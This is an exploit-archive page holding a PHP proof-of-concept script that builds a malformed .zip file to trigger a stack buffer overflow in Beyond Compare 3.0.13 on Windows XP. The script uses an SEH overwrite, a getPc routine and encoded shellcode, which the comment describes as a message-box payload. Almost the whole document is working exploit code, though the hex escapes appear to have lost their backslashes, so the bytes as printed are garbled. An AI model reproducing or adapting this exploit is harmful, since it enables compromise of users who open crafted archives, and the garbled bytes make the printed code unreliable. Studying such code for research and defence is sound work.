[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Beyond Compare 3.0.13 b9599 (.zip) 0day Stack Buffer Overflow PoC Exploit
# Published : 2010-05-04
# Author : mr_me
# Previous Title : BaoFeng Storm M3U File Processing Buffer Overflow Exploit
# Next Title : PhotoFiltre Studio X .tif file local buffer overflow poc(0day)
<?php
/********************************************************************************
Beyond Compare 3.0.13 b9599 (.zip) 0day Stack Buffer Overflow PoC exploit
Author: mr_me - http://net-ninja.net/
Download: http://es.kioskea.net/remote/download_get.php?ID=2321
Platform: Windows XP sp3
Advisory: http://www.corelan.be:8800/advisories.php?id=10-036
Patched in latest version and previous versions
Greetz to: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
Thanks to rick2600 and corelanc0d3r for the getPc !
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !
Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
********************************************************************************/
echo "
|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| ___/____/_/ ___/_/__,_/_/ /_/ __/___/__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| security@corelan.be |
| |
|-------------------------------------------------[ EIP Hunters ]--|
~~> Beyond compare 3.0.13 b9599 (.zip) BOF PoC exploit <~~
";
// local file header
$lf_header = "x50x4Bx03x04x14x00x00x00x00x00xB7xACxCE".
"x34x00x00x00x00x00x00x00x00x00x00x00x00x14x08x00x00";
// central directory file header
$cdf_header = "x50x4Bx01x02x14x00x14x00x00x00x00x00xB7".
"xACxCEx34x00x00x00x00x00x00x00x00x00x00x00x00x14x08".
"x00x00x00x00x00x00x01x00x24x00x00x00x00x00x00x00";
// end of central directory record
$efcdr_record = "x50x4Bx05x06x00x00x00x00x01x00x01x00".
"x42x08x00x00x32x08x00x00x00x00";
// corelan security team - msgbox
$sc = "VYhffffk4diFkDql02Dqm0D1CuEE5n3l0G3j3C0S1p02024B0W3y2G2u4D0k4q3c".
"0615092E0T0H0l4s4u1k0A2p3G0Y3W3A0u2K2J0P2o4E3U2L370w3N5O3h2p1O2w1o3v4".
"T3P4n1K3v4n0z3Y0S0M2k5L4J0m4Y2D103V2s4K4t0Q0U0P7o2L4P2O8K3r0j0y0N0s37".
"2l0m5K0Y8M0S5p4V110Q2J182s7M2K344J3j04VYVTX10X41PZ41H4A4I1TA71TADVTZ3".
"2PZNBFZDQC02DQD0D13DJEON4F1W9M490R0P08654E2M9Y2F64346K5K450115MN2G0N0".
"B0L5C5DKO106737KO9W8P0O2L1L0P184E3U0Q8P1G3L5O9R601E671O9W343QOO113RJO".
"LK8M640M1K3WOL1W4Y2O613V2I4K5C0R0S0PMO2O3W2O8K9R1Z1K0S1H3PLMKM5KKK8M0".
"S4JJL15612J1267KM2K4D903K03VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQ".
"AIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYA".
"ZBABABABAB30APB944JB9K7YMY7Y7O1SKWKQ0X6QLT8Y2TMTJT1K3S7SKT013KLUKS3KL".
"U3QJR1Y04MT4S1Y6L9UKTLX0I1P096TJPML5N0E5K4O6LMP07MW038R9WJT9K0J4M5NOK".
"KKMS3N0L4L8S1N8NLW11JV1V6YKO1SMO1P2OMNKOMK4N8QOO0KKR104POLLZ3XLWJXML6".
"SKN03MQMK0GMQ1ZLZ8K6Y4LKPA";
/*
Corelan's - getPc routine
0424F020 EB 05 JMP SHORT 0424F027
0424F022 5E POP ESI
0424F023 41 INC ECX
0424F024 FFD6 CALL ESI
0424F026 41 INC ECX
0424F027 E8 F6FFFFFF CALL 0424F022
*/
// ascii armoured & mangled
$getPc = "x89x05x5ex41x98x99x41x8ax94x98x98x98";
$sEh = "x0dx05x01x10"; // add esp, 8; retn --> 7zxa.dll
$trigger = "x3a";
// build the PoC
$junk = str_repeat("x41", 2064)."x2ex74x78x74";
$lol = str_repeat("x41", 223)."x41x73x06x41".$sEh.$getPc.$sc;
$lol .= str_repeat("x41",2062-strlen($lol)).$trigger."x2ex74x78x74";
$_____boooom = $lf_header.$junk.$cdf_header.$lol.$efcdr_record;
file_put_contents("cst-beyondcompare.zip",$_____boooom);
?>